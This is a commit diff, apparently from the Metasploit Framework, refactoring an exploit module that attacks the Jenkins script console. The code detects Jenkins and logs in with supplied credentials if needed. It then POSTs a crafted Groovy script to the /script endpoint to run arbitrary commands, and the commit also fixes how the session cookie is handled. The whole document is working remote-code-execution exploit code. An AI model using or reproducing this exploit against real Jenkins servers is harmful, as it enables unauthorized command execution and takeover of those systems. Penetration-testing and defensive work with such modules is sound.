use target_uri and normalize_uri as well as fix a cookie problem

zeroSteiner · zeroSteiner · commit 6b40011a6f2e · 2013-01-19T19:10:56.000-05:00
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -26,7 +26,6 @@ def initialize(info = {})
 					'jamcut'
 				],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: $',
 			'DefaultOptions' =>
 				{
 					'WfsDelay' => '10',
@@ -45,14 +44,17 @@ def initialize(info = {})
 
 		register_options(
 			[
-				OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),
-				OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),
-				OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]),
+				OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
+				OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
+				OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]),
 			], self.class)
 	end
 
 	def check
-		res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"})
+		uri = target_uri
+		uri.path = normalize_uri(uri.path)
+		uri.path << "/" if uri.path[-1, 1] != "/"
+		res = send_request_cgi({'uri' => "#{uri.path}login"})
 		if res and res.headers.include?('X-Jenkins')
 			return Exploit::CheckCode::Detected
 		else
@@ -61,16 +63,17 @@ def check
 	end
 
 	def http_send_command(cmd, opts = {})
-		res = send_request_cgi({
+		request_parameters = {
 			'method'    => 'POST',
-			'uri'       => datastore['PATH'] + '/script',
-			'cookie'    => @cookie,
+			'uri'       => "#{@uri.path}script",
 			'vars_post' =>
 				{
 					'script' => java_craft_runtime_exec(cmd),
 					'Submit' => 'Run'
 				}
-		})
+		}
+		request_parameters['cookie'] = @cookie if @cookie != nil
+		res = send_request_cgi(request_parameters)
 		if not (res and res.code == 200)
 			fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
 		end
@@ -101,21 +104,19 @@ def execute_command(cmd, opts = {})
 	end
 
 	def exploit
+		@uri = target_uri
+		@uri.path = normalize_uri(@uri.path)
+		@uri.path << "/" if @uri.path[-1, 1] != "/"
 		print_status('Checking access to the script console')
-		res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"})
-		if not (res and res.code)
-			fail_with(Exploit::Failure::Unknown)
-		end
-
-		sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
-		@cookie = "#{sessionid}"
+		res = send_request_cgi({'uri' => "#{@uri.path}script"})
+		fail_with(Exploit::Failure::Unknown) if not res
 
+		@cookie = nil
 		if res.code != 200
 			print_status('Logging in...')
 			res = send_request_cgi({
 				'method'    => 'POST',
-				'uri'       => datastore['PATH'] + '/j_acegi_security_check',
-				'cookie'    => @cookie,
+				'uri'       => "#{@uri.path}j_acegi_security_check",
 				'vars_post' =>
 					{
 						'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
@@ -127,6 +128,8 @@ def exploit
 			if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
 				fail_with(Exploit::Failure::NoAccess, 'login failed')
 			end
+			sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0]
+			@cookie = "#{sessionid}"
 		else
 			print_status('No authentication required, skipping login...')
 		end
